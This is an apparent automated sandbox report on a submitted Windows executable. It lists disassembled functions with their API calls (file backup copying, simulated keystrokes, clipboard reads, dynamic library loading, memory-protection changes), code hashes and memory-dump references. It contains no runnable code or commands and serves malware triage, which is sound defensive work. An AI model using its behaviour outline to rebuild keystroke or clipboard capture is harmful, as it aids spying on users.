                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: 2$3$4$5$6$7123456
                                                                                                      • API String ID: 2299586839-3626163788
                                                                                                      • Opcode ID: cc269356e7e5d37e2a8bbe98fb2c1fa2c35fcef2f1eb594650d00b6a01fd30a1
                                                                                                      • Instruction ID: df135c90cf4fd96ecc2958faa78990d9e9a54762d9a1c2938bb780a1a1e2f662
                                                                                                      • Opcode Fuzzy Hash: cc269356e7e5d37e2a8bbe98fb2c1fa2c35fcef2f1eb594650d00b6a01fd30a1
                                                                                                      • Instruction Fuzzy Hash: 03014BB1800209EBEF11CF88C9497EEBBB8BB04348F504069A700BB2C0D7B95B4ACF54
                                                                                                      Function 00424156 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71filetimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042415B
                                                                                                        • Part of subcall function 00424245: lstrcpyW.KERNEL32(?), ref: 0042425B
                                                                                                        • Part of subcall function 00424245: lstrcatW.KERNEL32(?,00000000,\Backup), ref: 0042428F
                                                                                                        • Part of subcall function 00424245: CreateDirectoryW.KERNEL32(?,00000000), ref: 004242A6
                                                                                                        • Part of subcall function 00424245: lstrlenW.KERNEL32(?), ref: 004242BD
                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0042416C
                                                                                                        • Part of subcall function 00407444: VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      • CopyFileW.KERNEL32(?,00000000,?,00000000,?,?,0048039C,00000000,00445508), ref: 00424207
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyCreateDirectoryFileH_prologLocalProtectTimeVirtuallstrcatlstrcpylstrlen
                                                                                                      • String ID: %02d-%02d-%02d_%02d-%02d-%02d_%s.ini$4AD$last_backup
                                                                                                      • API String ID: 1991952598-3850644810
                                                                                                      • Opcode ID: 2cfff92b74627da5505d228bde40bd7ce73ff92faccde237975adc6a413c2e0d
                                                                                                      • Instruction ID: 8c1af6343298e20960110cf1ab86fd2bd36cdd14f9dc99471fedbc98cf0c5e88
                                                                                                      • Opcode Fuzzy Hash: 2cfff92b74627da5505d228bde40bd7ce73ff92faccde237975adc6a413c2e0d
                                                                                                      • Instruction Fuzzy Hash: 74214BB1C00249AADB00EBE5C946BFEBBB8AF08705F10406AF551B31C2D77C9A44D779
                                                                                                      Function 004324DC Relevance: 9.1, APIs: 6, Instructions: 52keyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsWindow.USER32(?), ref: 004324EA
                                                                                                      • GetKeyboardState.USER32(?), ref: 0043251A
                                                                                                      • keybd_event.USER32(00000012,00000000,00000001,00000000), ref: 00432535
                                                                                                      • SetForegroundWindow.USER32(?), ref: 0043253A
                                                                                                      • GetKeyboardState.USER32(?), ref: 00432547
                                                                                                      • keybd_event.USER32(00000012,00000000,00000003,00000000), ref: 0043255D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: KeyboardStateWindowkeybd_event$Foreground
                                                                                                      • String ID:
                                                                                                      • API String ID: 3738427976-0
                                                                                                      • Opcode ID: 2c72c861c302e1139b07c97f33455dde5ae2a2ab37e195d2adcee556ea12027a
                                                                                                      • Instruction ID: 94379a26eef160f79566083ef4e3578c49d00e1bcfa1839136e3bbe5105c761c
                                                                                                      • Opcode Fuzzy Hash: 2c72c861c302e1139b07c97f33455dde5ae2a2ab37e195d2adcee556ea12027a
                                                                                                      • Instruction Fuzzy Hash: 1E01B131A002AD7EEF219B74DD44BAB3B6CAB48754F0010B6EA44F21D1D7B09F418E68
                                                                                                      Function 00434350 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(USER32.DLL), ref: 00434390
                                                                                                      • GetProcAddress.KERNEL32(?,VkKeyScanW), ref: 004343AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: USER32.DLL$VkKeyScanW$yScanW
                                                                                                      • API String ID: 2574300362-2509131655
                                                                                                      • Opcode ID: f33a238c0a0008be8fa80d9092039b86b37356b8e18231454f539763cbe0bda6
                                                                                                      • Instruction ID: 00ef8408c9c2cd366938f6668c4c85d73a7131af4500c8c6c3acde0d2035717b
                                                                                                      • Opcode Fuzzy Hash: f33a238c0a0008be8fa80d9092039b86b37356b8e18231454f539763cbe0bda6
                                                                                                      • Instruction Fuzzy Hash: F3018030908388EEEB5197B4D80938E7FF19B15308F0480ECD44467292D3FA5658DF69
                                                                                                      Function 0040337A Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$YW$[Q$n$n$x
                                                                                                      • API String ID: 0-3733382513
                                                                                                      • Opcode ID: dd0ef1cbc494f13dde0586bf8508a516c2e205faa3270730c95445b26c300a20
                                                                                                      • Instruction ID: 6fba0f501ab0943450f67823c4e29e96368d9963752fe36cec1d586fc21bdd77
                                                                                                      • Opcode Fuzzy Hash: dd0ef1cbc494f13dde0586bf8508a516c2e205faa3270730c95445b26c300a20
                                                                                                      • Instruction Fuzzy Hash: 161229B2C002555FE728CF24DD89AEEBB79EB94304F0481BEE8096B6C4D7785B85CE41
                                                                                                      Function 00434323 Relevance: 6.0, APIs: 4, Instructions: 19clipboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OpenClipboard.USER32(00000000), ref: 00434327
                                                                                                      • GetClipboardData.USER32(00000002), ref: 00434333
                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0043433E
                                                                                                      • CloseClipboard.USER32 ref: 00434346
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$CloseCopyDataImageOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2896386989-0
                                                                                                      • Opcode ID: 6bc4409cf92e0c4b559146a8cda6cfea7f49d02a4458caa6f6bb6dc61c469143
                                                                                                      • Instruction ID: ae6ccb5f66b5ea4bda8400da76b36a25fcd4829f1dd4941bc9b18cba1d739411
                                                                                                      • Opcode Fuzzy Hash: 6bc4409cf92e0c4b559146a8cda6cfea7f49d02a4458caa6f6bb6dc61c469143
                                                                                                      • Instruction Fuzzy Hash: 0FD09E3260223067C6302BB27C5DEDB6D5CEF566E17012124F909E3251D6248801C7F8
                                                                                                      Function 004026E4 Relevance: 5.1, Strings: 4, Instructions: 139COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$n$n$x
                                                                                                      • API String ID: 0-2129689772
                                                                                                      • Opcode ID: 849c4bb2ec3fa9d698610d71777418e7cf5c19f5d9f91457b5ca852dc4332196
                                                                                                      • Instruction ID: 735f5b4da8331645844417ca64cad557d6321c62bc13208096b199d8b61b0453
                                                                                                      • Opcode Fuzzy Hash: 849c4bb2ec3fa9d698610d71777418e7cf5c19f5d9f91457b5ca852dc4332196
                                                                                                      • Instruction Fuzzy Hash: D551F5B2C052155FF728CB10DE85ADABBB9EB91308F0081BEE10D6A1C5D7794B86CE41
                                                                                                      Function 00402761 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$n$n$x
                                                                                                      • API String ID: 0-2129689772
                                                                                                      • Opcode ID: beb718cf41d947cc1add40c43f8370747f105df19228a5f3ac2367194749f8b8
                                                                                                      • Instruction ID: 2f5be55457576204f31c677dd81434ec53dfcfccf5e5f056ed14e266ab9a9fef
                                                                                                      • Opcode Fuzzy Hash: beb718cf41d947cc1add40c43f8370747f105df19228a5f3ac2367194749f8b8
                                                                                                      • Instruction Fuzzy Hash: 6441D5B2C052155BF724CA21DD89AEA7BB9EB81318F0041BAE50DAA1C1D7BD4AC6CE41
                                                                                                      Function 0040A2AC Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 54GA$S
                                                                                                      • API String ID: 0-1418622916
                                                                                                      • Opcode ID: e115f5482505c734284545a519cfefa582fc293c363ebda655dc79e0ef4dbf8f
                                                                                                      • Instruction ID: 9a692fc27256c8884be25ba0aba4e12389cc1e25e169a16f645ded9fc16d7ecc
                                                                                                      • Opcode Fuzzy Hash: e115f5482505c734284545a519cfefa582fc293c363ebda655dc79e0ef4dbf8f
                                                                                                      • Instruction Fuzzy Hash: C012AEB1D046288BEB24CB14DC94AEAB775FF85304F1482FAD84E66680D6395ED2CF46
                                                                                                      Function 00410573 Relevance: .5, Instructions: 522COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e30732e8167006570901f96fe7cb8acf27cb62d75a8cee8a0175fcbd4798b4db
                                                                                                      • Instruction ID: 9f491d3c553b219ae2165434e5eaf9711b11f421a5afcb8296a71859b4db5029
                                                                                                      • Opcode Fuzzy Hash: e30732e8167006570901f96fe7cb8acf27cb62d75a8cee8a0175fcbd4798b4db
                                                                                                      • Instruction Fuzzy Hash: 1B22CEB1E042288FEB24CB14CC94BEAB7B5EB85310F1481FAD80DA6640D6785FC2CF56
                                                                                                      Function 0041A4B6 Relevance: .4, Instructions: 374COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
